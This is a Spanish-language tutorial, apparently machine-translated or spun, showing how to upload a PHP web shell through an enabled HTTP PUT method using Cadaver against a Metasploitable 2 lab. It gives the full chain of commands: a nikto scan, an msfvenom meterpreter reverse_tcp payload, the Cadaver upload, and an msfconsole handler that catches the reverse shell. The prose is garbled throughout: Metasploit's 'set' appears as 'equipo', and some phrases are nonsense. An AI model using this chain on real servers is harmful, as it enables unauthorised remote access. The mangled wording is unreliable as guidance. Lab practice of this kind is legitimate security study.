Linux

Cadáver: utilizando la puerta de inseguridad HTTP PUT

Cadaver es un cliente WebDAV de línea de comandos para UNIX. Acepta cargar y cargar ficheros en WebDAV. Cadáver Pre instalado Kali LinuxAsimismo tenemos la posibilidad de utilizar el procedimiento HTTP PUT para bajar el shell web al sistema vulnerable.

El procedimiento PUT se ingresó inicialmente como entre los métodos HTTP para conducir ficheros. El inconveniente es que si el procedimiento HTTP PUT está habilitado en el servidor web, se puede emplear para cargar elementos maliciosos en el servidor de destino. ¿Busca un shell web?

Para corroborar que el sistema propósito tiene un procedimiento HTTP PUT que tenemos la posibilidad de utilizar para cargar un shell malicioso, tenemos la posibilidad de escanear nuestro propósito con Nikto. Aquí tomamos Metasploitable 2 como un ejemplo.

Empleamos Nikto para escanear este servidor web vulnerable con el próximo comando:

nikto -h http://172.17.0.2/dav/

En la próxima atrapa de pantalla, podemos consultar que esta app web vulnerable nos deja poner ficheros en el servidor web a través de el procedimiento HTTP PUT:

La aplicación web vulnerable nos permite colocar archivos en el servidor web utilizando el método HTTP PUT
La app web deja emplear el procedimiento HTTP PUT para guardar ficheros en el servidor web.

En este momento requerimos un shell web para cargar aquí. Tenemos la posibilidad de emplear msfvenom o algún otro procedimiento. Para msfvenom, requerimos realizar el próximo comando para hacer un shell web.

msfvenom -p php/meterpreter/reverse_tcp lhost=172.17.0.1 lport=4444 -f raw

Aquí, lhost es la dirección IP de nuestro sistema agresor (en nuestro ejemplo 172.17.0.1). Tras realizar el comando msfvenom, se va a crear una puerta posterior RAW como se expone en la atrapa de pantalla ahora:

Shell-web-raw-php

En este momento tenemos la posibilidad de hacer un shell.php (cualquier nombre con una extensión del archivo .php) y pegar el payload / shell etiquetado en él. En este momento se puede cargar.

Como se mentó previamente, Cadaver es una herramienta de línea de comandos preinstalada en la máquina Kali que deja cargar y cargar ficheros a WebDAV. Primero requerimos emplear Cadaver para concretar nuestro destino con el próximo comando:

cadaver http://172.17.0.2/dav/

Entonces requerimos pegar nuestro fichero php de shell web con el próximo comando:

put /home/kali/testshell.php

En la atrapa de pantalla ahora, podemos consultar que hemos cargado apropiadamente nuestro shell web en nuestro servidor web de destino.

Cargue el caparazón del caparazón en la malla

En este momento, en el momento en que actualizamos el sitio de destino, observamos que el shell web de Cadaver se ha descargado en ese servidor.

Cadaver sube la carga web al servidor

En este momento tenemos la posibilidad de emplearlo mediante msfconsole. Requerimos realizar el comando msfconsole en la terminal para abrir la consola de Metasploit Framework.

msfconsole

Tras abrir consola Configuramos nuestro controlador, configuramos el payload, configuramos lhost (IP del agresor), configuramos lport y utilizamos los próximos comandos para explotarlos uno por uno.

use exploit/multi/handler
equipo payload php/meterpreter/reverse_tcp
equipo lhost 172.17.0.1
equipo lport 4444
exploit

Entonces comienza nuestro controlador TCP inverso. En este momento debemos clickear en la carga útil de nuestro portal web.

Un clic para usar

¡Bingo! ! Poseemos un caparazón invertido.

Tengo almejas

Entonces tenemos la posibilidad de explotar la puerta de inseguridad HTTP PUT Cadáver Síganos Kali Linux Sistema.

Invencible gracioso gif

Este procedimiento se emplea para cambiar o remover ficheros en el sistema de ficheros del servidor de destino. El peligro de múltiples inseguridades de descarga de ficheros asimismo ha incrementado, lo que puede conducir a múltiples asaltos de red peligrosos. A fin de que el servidor sea mucho más seguro, si la organización quiere emplear este permiso, aconsejamos que el servidor seguro limitado de la organización tenga privilegios de ingreso a ficheros que estén limitados al personal autorizado.
Procedimiento HTTP PUT.

Disfrutas nuestro articulo Cerciórate de esto Síganos a Gorjeo Y GitHub, donde publicamos actualizaciones de productos; Únete a nosotros KaliLinuxIn La familia viene a nosotros Conjunto de telegramasEstamos trabajando arduamente para hacer una red social de seguridad de red y Linux, y siempre y en todo momento nos encontramos contentos de contribuir a todos. En el cuadro deComo todos entendemos, nuestra sección de comentarios siempre y en todo momento está abierta a todos, leemos todos y cada uno de los comentarios y Siempre y en todo momento respondemos.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba